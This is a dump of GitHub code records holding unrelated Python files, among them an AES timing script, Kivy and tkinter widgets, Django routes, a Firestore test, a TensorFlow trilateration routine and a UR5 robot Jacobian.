'abb': {\n 'abba': {},\n 'abbb': {}\n },\n 'abc': {}\n },\n 'ac': {\n\n }\n },\n 'b': {\n 'ba': {\n 'baa': {\n\n },\n 'bab': {}\n },\n 'bb': {}\n }}\n}\n\n\ngraph = nx.from_dict_of_dicts(testdict)\n\nnx.draw(graph)\nplt.draw()\nplt.show()\n","repo_name":"Sergiogd112/ClassNotes","sub_path":"dict_to_mmap.py","file_name":"dict_to_mmap.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1525271669","text":"import AES256\nimport time\nfrom readBlockFile import *\nfrom readKeyFile import *\n\nstartExec = time.time()\n#Read blocks and key from 
files\nprint(\"-- Reading plaintext --\")\nstart = time.time()\nblocks = getBlocks(\"tWotW.txt\")\nkey = getKey(\"testKey\")\nencBlocks = []\nreadPlainTime = time.time() - start\n\n## Encrypt\nprint(\"-- Encrypting --\")\nstart = time.time()\nexpKey = AES256.getExpKey(key)\nfor block in blocks:\n\t#Add filler bytes in the last block\n\twhile len(block) != 16:\n\t\tblock.append(0)\n\tencBlocks.append(AES256.encrypt(block, expKey))\nencTime = time.time() - start\n\t\n#The real MVP: https://stackoverflow.com/questions/17349918/python-write-string-of-bytes-to-file\n## Write encrypted data to file\nprint(\"-- Writing encrypted data to file --\")\nstart = time.time()\nwith open(\"encFile\", 'wb') as file:\n\tfor eBlock in encBlocks:\n\t\tfile.write(bytearray(eBlock))\n\tfile.close()\nwriteEncTime = time.time() - start\n\n## Read encrypted file\t\nprint(\"-- Reading encrypted file --\")\nstart = time.time()\nblocks = getBlocks(\"encFile\")\ndecBlocks = []\nreadEncTime = time.time() - start\n\n## Decrypt\nprint(\"-- Decrypting --\")\nstart = time.time()\nexpKey = AES256.getExpKey(key)\nfor block in blocks:\n\tdecBlocks.append(AES256.decrypt(block, expKey))\n\n## Clean filler bytes in last block\nfor count in range(15,-1,-1):\n\tif decBlocks[len(decBlocks)-1][count] == 0:\n\t\tdecBlocks[len(decBlocks)-1].pop(count)\n\telse:\n\t\tbreak\ndecTime = time.time() - start\n\t\t\n## Write decrypted data to file\nstart = time.time()\nwith open(\"decFile\", 'wb') as file:\n\tfor dBlock in decBlocks:\n\t\tfile.write(bytearray(dBlock))\n\tfile.close()\nwriteDecTime = time.time() - start\nexecTime = time.time() - startExec\n\n#https://stackoverflow.com/questions/1557571/how-do-i-get-time-of-a-python-programs-execution\nprint(\"Total execution time: %s seconds\" % (execTime))\nprint(\"Read plaintext time: %s seconds\\nWrite encrypted time: %s seconds\\nRead encrypted time: %s seconds\\nWrite decrypted time: %s seconds\" % (readPlainTime, writeEncTime, readEncTime, writeDecTime))\nprint(\"Encryption time: %s seconds\\nDecryption time: %s seconds\" % (encTime, decTime))","repo_name":"Tivoro/DT2017","sub_path":"AES/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73617575848","text":"from tkinter import *\nfrom tkinter import ttk\nfrom tkinter import Text\nroot = Tk()\nfrm = ttk.Frame(root, padding=100)\nfrm.grid()\nt = Text(frm, width = 40, height = 1, wrap = \"none\")\nys = ttk.Scrollbar(root, orient = 'vertical', command = t.yview)\nxs = ttk.Scrollbar(root, orient = 'horizontal', command = t.xview)\nt['yscrollcommand'] = ys.set\nt['xscrollcommand'] = xs.set\nt.insert('end', \"Lorem ipsum...\\n...\\n...\")\nt.grid(column = 0, row = 0, sticky = 'nwes')\nxs.grid(column = 0, row = 1, sticky = 'we')\nys.grid(column = 1, row = 0, sticky = 'ns')\nroot.grid_columnconfigure(0, weight = 1)\nroot.grid_rowconfigure(0, weight = 1)\nttk.Button(frm, text=\"Quit\", command=root.destroy).grid(column=1, row=0)\nttk.Label(frm, text=\"Hello World!\").grid(column=0, row=2)\n\nroot.mainloop()","repo_name":"Basith5075/Data_Science_Submission","sub_path":"Certification/Practice/python-practice/Tkinter/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38676850912","text":"from kivy.lang import Builder\nfrom kivy.properties import ListProperty, NumericProperty\nfrom 
kivy.uix.effectwidget import EffectWidget\n\nfrom .blureffect import BlurEffect\nfrom .saturationeffect import SaturationEffect\nfrom .luminancerangeeffect import LuminanceRangeEffect\n\nBuilder.load_string('''\n:\n tint_color: 1, 1, 1, 0\n\n canvas.after:\n Color:\n rgba: self.tint_color\n Rectangle:\n pos: self.effect_region[:2]\n size: self.effect_region[2:]\n''')\n\n\nclass RealtimeBlurWidget(EffectWidget):\n effect_region = ListProperty([0, 0, 0, 0])\n\n blur_radius = NumericProperty(14.0)\n\n saturation = NumericProperty(0.8)\n\n range_reduction = NumericProperty(1.0)\n\n tint_color = ListProperty([0, 0, 0, 0])\n\n def __init__(self, *args, **kwargs):\n super(RealtimeBlurWidget, self).__init__(*args, **kwargs)\n self.saturate_effect = SaturationEffect(saturation=self.saturation)\n self.luminance_effect = LuminanceRangeEffect(range_reduction=self.range_reduction)\n self.blur_effect = BlurEffect(blur_radius=self.blur_radius)\n self.effects = [self.saturate_effect, self.blur_effect, self.luminance_effect]\n self.update()\n\n def update(self):\n self.blur_effect.blur_radius = int(self.blur_radius)\n self.saturate_effect.saturation = float(self.saturation)\n self.luminance_effect.range_reduction = float(self.range_reduction)\n\n def on_blur_radius(self, instance, radius):\n self.blur_effect.blur_radius = int(radius)\n\n def on_saturation(self, instance, saturation):\n self.saturate_effect.saturation = float(saturation)\n\n def on_range_reduction(self, instance, reduction):\n self.luminance_effect.range_reduction = float(reduction)\n\n def on_effect_region(self, instance, region):\n self.saturate_effect.effect_region = map(float, region)\n self.luminance_effect.effect_region = map(float, region)\n self.blur_effect.effect_region = map(float, region)","repo_name":"Schlaubischlump/KivyRealtimeBlur","sub_path":"realtimeblur/blurwidget.py","file_name":"blurwidget.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"27465918141","text":"from django.urls import path\n\nfrom . 
import views\n\napp_name = 'SquirrelApp'\n\nurlpatterns = [\n path('index', views.index, name='index'),\n path('sightings', views.sightings, name='sightings'),\n path('sightings/details/', views.sighting_details, name='detail'),\n path('sightings/add', views.add_page, name='add_page'),\n path('sightings/stats', views.stats, name='stats'),\n path('sightings/', views.update_page, name='update_page'),\n path('add', views.update_request, name=\"add\"),\n path('update', views.update_request, name=\"update\"),\n path('map',views.map,name='map'),\n\n ]\n \n","repo_name":"charlotte-liao/Squirrel-project1","sub_path":"SquirrelApp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18673047895","text":"import datetime\nimport json\nimport logging\nimport os\nimport unittest\n\nimport requests\n\nfrom bookmarks_sync.firebase_app import FirebaseApp\nfrom bookmarks_sync.firestore_database import BookmarkRecord, FirestoreDatabase\n\n\ndef load_json(file_name):\n return json.loads(open(file_name).read())\n\n\nsingle_bookmark = load_json(\"tests/resources/single_bookmark.json\")\n\nlogging.basicConfig(level=\"DEBUG\")\nlogger = logging.getLogger(\"TestFirestoreDatabase\")\n\napp = FirebaseApp.admin(\"bullfrog-reader\")\n\n\ndef clear_database():\n logger.debug(\"clearing db\")\n r = requests.delete(\n \"http://localhost:8080/emulator/v1/projects/bullfrog-reader/databases/(default)/documents\"\n )\n logger.debug(f\"done; status={r.status_code}\")\n\n\nclass BookmarkRecords(object):\n\n @classmethod\n def from_pocket_record(cls, pocket_record) -> BookmarkRecord:\n return {\n \"pocket_item_id\":\n \"A84FB302-F7B6-4D88-BC36-5369812BBA90\",\n \"url\":\n pocket_record[\"given_url\"],\n \"pocket_created_at\":\n datetime.datetime.fromtimestamp(int(pocket_record[\"time_added\"])),\n \"pocket_updated_at\":\n datetime.datetime.fromtimestamp(int(pocket_record[\"time_updated\"])),\n \"pocket_json\":\n json.dumps(pocket_record),\n \"text\": \"foo\",\n \"metadata\": None,\n }\n\n\n\nclass TestFirestoreDatabase(unittest.TestCase):\n\n def setUp(self):\n os.environ[\"FIRESTORE_EMULATOR_HOST\"] = \"localhost:8080\"\n os.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"] = \"tests/resources/test-project-4abbf-199fc0e689ec.json\"\n clear_database()\n\n def test_save_items(self):\n db = FirestoreDatabase.admin(app)\n db.add_items(\n \"user@blfrg.xyz\",\n [BookmarkRecords.from_pocket_record(single_bookmark[\"item_0\"])],\n )\n\n def test_get_latest(self):\n db = FirestoreDatabase.admin(app)\n bm0 = db.get_latest_bookmark(\"user@blfrg.xyz\")\n self.assertEqual(bm0, None)\n bm1 = BookmarkRecords.from_pocket_record(single_bookmark[\"item_0\"])\n bm2 = BookmarkRecords.from_pocket_record(single_bookmark[\"item_0\"])\n bm2[\"url\"] = \"http://last.com\"\n db.add_items(\n \"user@blfrg.xyz\",\n [bm1],\n )\n db.add_items(\n \"user@blfrg.xyz\",\n [bm2],\n )\n bm = db.get_latest_bookmark(\"user@blfrg.xyz\")\n self.assertEqual(bm[\"url\"], \"http://last.com\")\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"Bullfrog-Labs/bullfrog","sub_path":"bfr/ingest-gcf/tests/test_firestore_database.py","file_name":"test_firestore_database.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10996471113","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 6 21:17:16 2018\n\n@author: 
john3\n\"\"\"\nimport os #be care with this will return true for directories and files\nimport pandas as pd\nimport requests\nimport bs4 as bs\nfrom collections import OrderedDict\n\n#{ticker:{year:{label:value}}}\n\n\ntickers=[\"snn\"]\nyearlabelvaluedict={}\ntickeryearlabelvaluedict={}\n\nfor ticker in tickers:\n IncomeUrl=\"https://www.marketwatch.com/investing/stock/\"+ticker+\"/financials\"\n respIncomeStatement=requests.get(IncomeUrl)\n soup=bs.BeautifulSoup(respIncomeStatement.text, \"lxml\")\n IncomeLabels=[e.get_text() for e in soup.select(\".rowTitle\")] #soup perused and labels and ratios extracted and fed into vbls based upon html characteristics\n IncomeValues=[e.get_text() for e in soup.select(\".valueCell\")] #soup perused and labels and ratios extracted and fed into vbls based upon html characteristics\n IncomeValues[0]=\"Currency\"\n new_dict=OrderedDict({k:v for k, v in zip(IncomeLabels, IncomeValues)})\nprint(new_dict)\n #the selected labels and selected ratios combined togteher into dictionary\n #tickerlabelratiodict[ticker.upper()]=OrderedDict(new_dict) #label:ratio dictionary as values into another dictionary where stock ticker for each group is the key\n #df=pd.DataFrame.from_dict(tickerlabelratiodict, orient=\"columns\")# dictionary turned into a pandas dataframe","repo_name":"scads88/Fundamentals","sub_path":"test13.py","file_name":"test13.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41118179302","text":"import matplotlib.pyplot as plt\nimport math\ny1 = []\ny2 = []\nprev_y1 = 1\nprev_y2 = 0\nbegin_t = 0 \nstep = 0.001\nepsi = 0.001\ncheck = False \ny1.insert(0,prev_y1)\ny2.insert(0,prev_y2)\n#Первое уравнение системы\ndef f1(y1, y2):\n return -0.08*y1 + 1.304*y2\n#Второе уравнение системы \ndef f2(y1, y2):\n return -1.31*y1 - 13.21*y2\n\n#Использование метода Рунге-Кутта для начальной таблицы \ndef runge_kutta(prev_y1, prev_y2, h):\n k11 = f1(prev_y1, prev_y2)\n k12 = f2(prev_y1, prev_y2)\n\n k21 = f1(prev_y1 + h * k11 / 2, prev_y2 + h * k12 / 2)\n k22 = f2(prev_y1 + h * k11 / 2, prev_y2 + h * k12 / 2)\n\n k31 = f1(prev_y1 + h * k21 / 2, prev_y2 + h * k22 / 2)\n k32 = f2(prev_y1 + h * k21 / 2, prev_y2 + h * k22 / 2)\n\n k41 = f1(prev_y1 + h * k31, prev_y2 + h * k32)\n k42 = f2(prev_y1 + h * k31, prev_y2 + h * k32)\n\n next_y1 = prev_y1 + (h / 6) * (k11 + 2 * k21 + 2 * k31 + k41)\n next_y2 = prev_y2 + (h / 6) * (k12 + 2 * k22 + 2 * k32 + k42)\n\n return [next_y1, next_y2]\nprint(\"step=%0.3f, y1=%0.3f, y2=%0.3f\"%(begin_t, y1[0], y2[0]))\nfor i in range(4):\n [prev_y1, prev_y2] = runge_kutta(prev_y1, prev_y2, step)\n print(\"step =%0.3f, y1 = %0.6f y2 = %0.6f\" % (step * (i + 1), prev_y1, prev_y2))\n y1.append(prev_y1)\n y2.append(prev_y2)\nplt.plot(step, 'o',y1, y2)\nplt.show()\n\ndef prediction_and_correction(y1,y2, f1,f2, step,check,epsi):\n #Этап прогноза\n pred_y1 = y1[-1] + step/24*(55*f1(y1[-1],y2[-1])-59*f1(y1[-2],y2[-2])+ 37*f1(y1[-3],y2[-3])-9*f1(y1[-4],y2[-4]))\n pred_y2 = y2[-1] + step/24*(55*f2(y1[-1],y2[-1])-59*f2(y1[-2],y2[-2]) + 37*f2(y1[-3],y2[-3])-9*f2(y1[-4],y2[-4]))\n #Этап коррекции\n corr_y1 = y1[-1] + step/24*(9*f1(pred_y1,pred_y2) + 19*f1(y1[-1],y2[-1])- 5*f1(y1[-2],y2[-2]) + f1(y1[-3],y2[-3]))\n corr_y2 = y2[-1] + step/24*(9*f2(pred_y1,pred_y2)+ 19*f2(y1[-1],y2[-1])-5*f2(y1[-2],y2[-2]) + f2(y1[-3],y2[-3]))\n summa = math.sqrt(math.pow(corr_y1 - pred_y1,2)+math.pow(corr_y2 - pred_y2,2))\n while summa < epsi:\n check = True\n 
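        # NOTE (reviewer): `summa` is never updated inside this `while` block,
        # so once the tolerance check passes the loop repeats forever; an
        # `if summa < epsi:` test (or a `break`) was presumably intended.
        # The second append just below also targets y1, but since corr_y2 is
        # the second solution component it presumably belongs on y2.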
y1.append(corr_y1)\n y1.append(corr_y2)\n print('yn1 на этапе прогноза:',pred_y1 ,'yn2 на этапе прогноза:',pred_y2,'yn1 на этапе коррекции:',corr_y1,'yn2 на этапе коррекции:',corr_y2,'Выполнение условия:',check)\n\nprint(prediction_and_correction(y1,y2, f1,f2, step,check,epsi))\n","repo_name":"MrFlava/justforfun","sub_path":"prediction_and_correction.py","file_name":"prediction_and_correction.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16795328357","text":"class TooYoungException(Exception):\n def __init__(self,age):\n self.age=age\nclass TooOldException(Exception):\n def __init__(self,age):\n self.age=age\ntry:\n age=int(input(\"Enter Age:\"))\n if age<18:\n raise TooYoungException(\"Plz wait some time \")\n elif age>65:\n raise TooOldException(\"Your age too old\")\n else:\n print(\"we will find one girl soon\")\nexcept TooYoungException as e:\n print(\"Plz wait some time \")\nexcept TooOldException as e:\n print(\"Your age too old \")\n\n\"\"\"5) Output\nEnter Age: 16\nPlz wait some time \n\nEnter Age:20\nwe will find one girl soon\n\nEnter Age:66\nYour age too old\"\"\"","repo_name":"thanksduck/Python22","sub_path":"Assignment /Assignment 4/Solution-5.py","file_name":"Solution-5.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"24302249444","text":"# Tu programa debe:\n\n# Pedir al usuario que ingrese una palabra.\n# Utilizar userWord = userWord.upper() para convertir la palabra ingresada por el usuario a mayúsculas; \n# Usa la ejecución condicional y la instrucción continue para \"comer\" las siguientes vocales A , E , I , O , U de la palabra ingresada.\n# Asigne las letras no consumidas a la variable palabrasinVocal e imprime la variable en la pantalla.\n\n\n# Datos de prueba\n\n# Entrada de muestra: Gregory\n\n# Salida esperada:\n# GRGRY\n\n# Entrada de muestra: abstemious\n\n# Salida esperada:\n# BSTMS\n\nuserWord = input(\"ingrese una palabra: \")\nuserWord = userWord.upper()\n\nfor i in userWord:\n if i == \"A\":\n continue\n elif i == \"E\":\n continue\n elif i == \"I\":\n continue\n elif i == \"O\":\n continue\n elif i == \"U\":\n continue\n else:\n print(i)\n\n","repo_name":"AlexRodriguezVillavicencio/algorithms-python","sub_path":"devoradorVocales.py","file_name":"devoradorVocales.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26524517627","text":"import json\nimport traceback\n\nfrom django.http.response import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.views.decorators.http import require_POST\n\nfrom blueapps.account.decorators import login_exempt\nfrom gcloud.contrib.admin.migration_api.decorators import require_migrate_token\nfrom gcloud.constants import TASK_CATEGORY\nfrom gcloud import err_code\nfrom gcloud.label.models import Label, TemplateLabelRelation\nfrom gcloud.tasktmpl3.models import TaskTemplate\nfrom django.utils.translation import ugettext_lazy as _\nimport logging\n\nlogger = logging.getLogger(\"root\")\n\n\n@login_exempt\n@csrf_exempt\n@require_POST\n@require_migrate_token\ndef migrate_template_category(request):\n try:\n params = json.loads(request.body)\n except Exception as e:\n message = _(f\"非法请求: 数据错误, 请求不是合法的Json格式, {e} | migrate_template_category\")\n logger.error(message)\n return 
JsonResponse(\n {\n \"result\": False,\n \"message\": message,\n \"code\": err_code.REQUEST_PARAM_INVALID.code,\n }\n )\n\n project_id = params.get(\"project_id\")\n creator = params.get(\"creator\", \"admin\")\n\n MIGRATE_LABEL_COLOR = \"#b3eafa\"\n category_mappings = {}\n existing_labels = Label.objects.filter(project_id=project_id).values(\"id\", \"name\")\n label_info = {label[\"name\"]: label[\"id\"] for label in existing_labels}\n for category_code, category_name in TASK_CATEGORY:\n if category_name in label_info:\n category_mappings[category_code] = label_info[category_name]\n elif category_code != \"Default\":\n label = Label(\n name=category_name,\n description=category_code,\n is_default=False,\n creator=creator,\n color=MIGRATE_LABEL_COLOR,\n project_id=project_id,\n )\n label.save()\n category_mappings[category_code] = label.id\n\n task_templates = TaskTemplate.objects.filter(project__id=project_id, is_deleted=False).values(\"id\", \"category\")\n label_relationships = [\n TemplateLabelRelation(template_id=template[\"id\"], label_id=category_mappings[template[\"category\"]])\n for template in task_templates\n if template[\"category\"] in category_mappings\n ]\n try:\n TemplateLabelRelation.objects.bulk_create(label_relationships, ignore_conflicts=True)\n except Exception as e:\n return JsonResponse(\n {\n \"result\": False,\n \"error\": \"migrate template category to labels error: {} \\n {}\".format(e, traceback.format_exc()),\n }\n )\n\n return JsonResponse({\"result\": True, \"data\": \"migrate template category to labels success\"})\n","repo_name":"TencentBlueKing/bk-sops","sub_path":"gcloud/contrib/admin/migration_api/template_category.py","file_name":"template_category.py","file_ext":"py","file_size_in_byte":2799,"program_lang":"python","lang":"en","doc_type":"code","stars":1001,"dataset":"github-code","pt":"53"} +{"seq_id":"74226097126","text":"import math\n\nimport plotly.io as pio\nimport plotly.graph_objects as go\n\nfrom .trilateration_utils import *\n\nimport numpy as np\nimport tensorflow as tf\n\ntilateration_debug = False\n\ndef trilateration(distance_map, room, shapes):\n beacons_x = [distance_map_item[\"x\"] for distance_map_item in distance_map]\n beacons_y = [distance_map_item[\"y\"] for distance_map_item in distance_map]\n beacons_r = [distance_map_item[\"r\"] for distance_map_item in distance_map]\n beacons_var = [distance_map_item[\"var\"] for distance_map_item in distance_map]\n\n x = tf.Variable([0], dtype=tf.float32)\n y = tf.Variable([0], dtype=tf.float32)\n\n X = tf.placeholder(tf.float32, [len(beacons_x), ])\n Y = tf.placeholder(tf.float32, [len(beacons_y), ])\n R = tf.placeholder(tf.float32, [len(beacons_r), ])\n\n cost = ((x - X) ** 2 + (y - Y) ** 2 - R ** 2) ** 2\n\n sess = tf.Session()\n sess.run(tf.global_variables_initializer())\n\n learning_rate = 0.001\n optimizer = tf.train.GradientDescentOptimizer(learning_rate).minimize(cost)\n\n n_iter = 1000\n # errors = []\n\n err = []\n\n for i in range(n_iter):\n _, err = sess.run([optimizer, cost], {\n X: beacons_x,\n Y: beacons_y,\n R: beacons_r\n })\n\n # errors.append(err)\n avg_error = (sum(err) / float(len(err))) ** 0.5\n if avg_error < 0.2:\n print(sum(err))\n break\n\n \n x, y, = sess.run(\n [x, y], {\n X: beacons_x, \n Y: beacons_y, \n R: beacons_r\n })\n\n avg_error = (sum(err) / float(len(err))) ** 0.5\n\n avg_error += max(beacons_var)\n\n result = [\n 0.0 if math.isnan(x[0]) else x[0].astype(float),\n 0.0 if math.isnan(y[0]) else y[0].astype(float),\n 1000.0 if math.isnan(avg_error) else 
avg_error\n ]\n\n # result = [result[0].astype(float), result[1].astype(float), result[2]]\n\n print(result, sum(err))\n\n if tilateration_debug:\n shapes.append(dict(\n type=\"circle\",\n xref=\"x\",\n yref=\"y\",\n x0 = result[0] - result[2],\n y0 = result[1] - result[2],\n x1 = result[0] + result[2],\n y1 = result[1] + result[2],\n line=dict(width=2, color=\"#FF9999\"),\n ))\n\n shapes.append(add_point(result[0:2], 0.05, \"#FF9999\"))\n\n\n return result\n\ndef multilateration(distance_map, room, shapes, SET_SIZE=3):\n print(distance_map)\n\n if len(distance_map) == 4:\n results = [\n trilateration([distance_map[i] for i in [1,2,3]], room, shapes),\n trilateration([distance_map[i] for i in [0,2,3]], room, shapes),\n trilateration([distance_map[i] for i in [0,1,3]], room, shapes),\n trilateration([distance_map[i] for i in [0,1,2]], room, shapes),\n trilateration(distance_map, room, shapes)\n ]\n\n result = sorted(results, key=lambda x: x[2])[0]\n else:\n result = trilateration(distance_map, room, shapes)\n \n return result","repo_name":"glitchcore/trilateration","sub_path":"gradient_multilat.py","file_name":"gradient_multilat.py","file_ext":"py","file_size_in_byte":3022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13355617290","text":"\nprint(\"import utils module sucessfully.\")\nimport numpy as np\nimport math\n\ndef sgn(x):\n if x<0:\n return -1\n elif x==0:\n return 0\n return 1\n\ndef transl(x,y,z):\n mat = np.eye(4)\n mat[0,3] = x\n mat[1,3] = y\n mat[2,3] = z\n return mat\n\ndef trotz(rot):\n mat = np.eye(4)\n mat[0,0] = math.cos(rot)\n mat[0,1] = - math.sin(rot)\n mat[1,0] = math.sin(rot)\n mat[1,1] = math.cos(rot)\n return mat\n\ndef trotx(rot):\n mat = np.eye(4)\n mat[1,1] = math.cos(rot)\n mat[1,2] = -math.sin(rot)\n mat[2,1] = math.sin(rot)\n mat[2,2] = math.cos(rot)\n return mat\n\ndef t2r(T):\n mat = T[0:3,0:3]\n return mat\n\ndef Jacob(q):\n '''\n especially for UR5\n '''\n d = np.array([0.0895, 0 ,0 ,0.1091 ,0.0946 ,0.0823])\n a = np.array([0, -0.4250, -0.3922, 0, 0, 0])\n alpha = np.array([1.5708, 0, 0, 1.5708, -1.5708, 0])\n offset = np.array([0, 0, 0, 0, 0, 0])\n thd = q + offset\n \n #T0=trotz(0)@transl(0,0,0)@trotx(0)@transl(0,0,0)\n T0 = np.matmul(trotz(0), transl(0,0,0))\n T0 = np.matmul(T0, trotx(0))\n T0 = np.matmul(T0, transl(0,0,0))\n # T1=trotz(thd[0])@transl(0,0,d[0])@trotx(alpha[0])@transl(a[0],0,0)\n T1 = np.matmul(trotz(thd[0]), transl(0,0,d[0]))\n T1 = np.matmul(T1, trotx(alpha[0]))\n T1 = np.matmul(T1, transl(a[0],0,0))\n # T2=trotz(thd[1])@transl(0,0,d[1])@trotx(alpha[1])@transl(a[1],0,0)\n T2 = np.matmul(trotz(thd[1]), transl(0,0,d[1]))\n T2 = np.matmul(T2, trotx(alpha[1]))\n T2 = np.matmul(T2, transl(a[1],0,0))\n # T3=trotz(thd[2])@transl(0,0,d[2])@trotx(alpha[2])@transl(a[2],0,0)\n T3 = np.matmul(trotz(thd[2]), transl(0,0,d[2]))\n T3 = np.matmul(T3, trotx(alpha[2]))\n T3 = np.matmul(T3, transl(a[2],0,0))\n # T4=trotz(thd[3])@transl(0,0,d[3])@trotx(alpha[3])@transl(a[3],0,0)\n T4 = np.matmul(trotz(thd[3]), transl(0,0,d[3]))\n T4 = np.matmul(T4, trotx(alpha[3]))\n T4 = np.matmul(T4, transl(a[3],0,0))\n # T5=trotz(thd[4])@transl(0,0,d[4])@trotx(alpha[4])@transl(a[4],0,0)\n T5 = np.matmul(trotz(thd[4]), transl(0,0,d[4]))\n T5 = np.matmul(T5, trotx(alpha[4]))\n T5 = np.matmul(T5, transl(a[4],0,0))\n # T6=trotz(thd[5])@transl(0,0,d[5])@trotx(alpha[5])@transl(a[5],0,0)\n T6 = np.matmul(trotz(thd[5]), transl(0,0,d[5]))\n T6 = np.matmul(T6, trotx(alpha[5]))\n T6 = np.matmul(T6, 
transl(a[5],0,0))\n\n T00 = T0\n T01 = T1\n T02 = np.matmul(T01, T2)\n T03 = np.matmul(T02, T3)\n T04 = np.matmul(T03, T4)\n T05 = np.matmul(T04, T5)\n T06 = np.matmul(T05, T6)\n\n # T16 = T2@T3@T4@T5@T6\n T16 = np.matmul(T2, T3)\n T16 = np.matmul(T16, T4)\n T16 = np.matmul(T16, T5)\n T16 = np.matmul(T16, T6)\n # T26 = T3@T4@T5@T6\n T26 = np.matmul(T3, T4)\n T26 = np.matmul(T26, T5)\n T26 = np.matmul(T26, T6)\n # T36 = T4@T5@T6\n T36 = np.matmul(T4, T5)\n T36 = np.matmul(T36, T5)\n # T46 = T5@T6\n T46 = np.matmul(T5, T6)\n T56 = T6\n\n R00 = t2r(T00)\n R01 = t2r(T01)\n R02 = t2r(T02)\n R03 = t2r(T03)\n R04 = t2r(T04)\n R05 = t2r(T05)\n R06 = t2r(T06)\n\n Z0 = R00[: , 2:3]\n Z1 = R01[: , 2:3]\n Z2 = R02[: , 2:3]\n Z3 = R03[: , 2:3]\n Z4 = R04[: , 2:3]\n Z5 = R05[: , 2:3]\n Z6 = R06[: , 2:3]\n\n P06 = T06[0:3, 3:4]\n P16 = T16[0:3, 3:4]\n P26 = T26[0:3, 3:4]\n P36 = T36[0:3, 3:4]\n P46 = T46[0:3, 3:4]\n P56 = T56[0:3, 3:4]\n # P66 = np.zeros((3,1))\n J1 = np.append(np.cross(Z0.T, np.matmul(R00, P06).T).T, Z0,axis = 0)\n J2 = np.append(np.cross(Z1.T, np.matmul(R01, P16).T).T, Z1,axis = 0)\n J3 = np.append(np.cross(Z2.T, np.matmul(R02, P26).T).T, Z2,axis = 0)\n J4 = np.append(np.cross(Z3.T, np.matmul(R03, P36).T).T, Z3,axis = 0)\n J5 = np.append(np.cross(Z4.T, np.matmul(R04, P46).T).T, Z4,axis = 0)\n J6 = np.append(np.cross(Z5.T, np.matmul(R05, P56).T).T, Z5,axis = 0)\n \n J = np.concatenate((J1, J2, J3, J4, J5, J6), axis = 1)\n\n return J\n\nif __name__ == \"__main__\":\n print(Jacob(np.array([1,1,1,1,1,1]))) #Debug\n","repo_name":"Edify0991/RoboticsSim","sub_path":"src/GripSim_Vrep/scripts/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9366726642","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\"\"\"Tests for aodh/storage/impl_sqlalchemy.py\n\n.. 
note::\n In order to run the tests against real SQL server set the environment\n variable aodh_TEST_SQL_URL to point to a SQL server before running\n the tests.\n\n\"\"\"\n\nfrom aodh.storage import impl_sqlalchemy as impl_sqla_alarm\nfrom aodh.tests import base as test_base\n\n\nclass CapabilitiesTest(test_base.BaseTestCase):\n def test_alarm_capabilities(self):\n expected_capabilities = {\n 'alarms': {'query': {'simple': True,\n 'complex': True},\n 'history': {'query': {'simple': True,\n 'complex': True}}},\n }\n\n actual_capabilities = impl_sqla_alarm.Connection.get_capabilities()\n self.assertEqual(expected_capabilities, actual_capabilities)\n","repo_name":"openstack/aodh","sub_path":"aodh/tests/functional/storage/test_impl_sqlalchemy.py","file_name":"test_impl_sqlalchemy.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"53"} +{"seq_id":"18149754117","text":"import os\nimport sys\ndef getMoneySpent(keyboards, drives, b):\n keyboards.sort()\n drives.sort()\n key_len = len(keyboards)\n drive_len = len(drives)\n max_spend = 0\n for i in range(key_len):\n for j in range(drive_len):\n if (keyboards[i] + drives[j]) > max_spend and (keyboards[i] + drives[j]) <= b:\n max_spend = keyboards[i] + drives[j]\n if max_spend == 0:\n return -1\n else:\n return max_spend\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n bnm = input().split()\n\n b = int(bnm[0])\n\n n = int(bnm[1])\n\n m = int(bnm[2])\n\n keyboards = list(map(int, input().rstrip().split()))\n\n drives = list(map(int, input().rstrip().split()))\n moneySpent = getMoneySpent(keyboards, drives, b)\n\n fptr.write(str(moneySpent) + '\\n')\n\n fptr.close()\n","repo_name":"Benson1198/31-Days-of-CP","sub_path":"Day 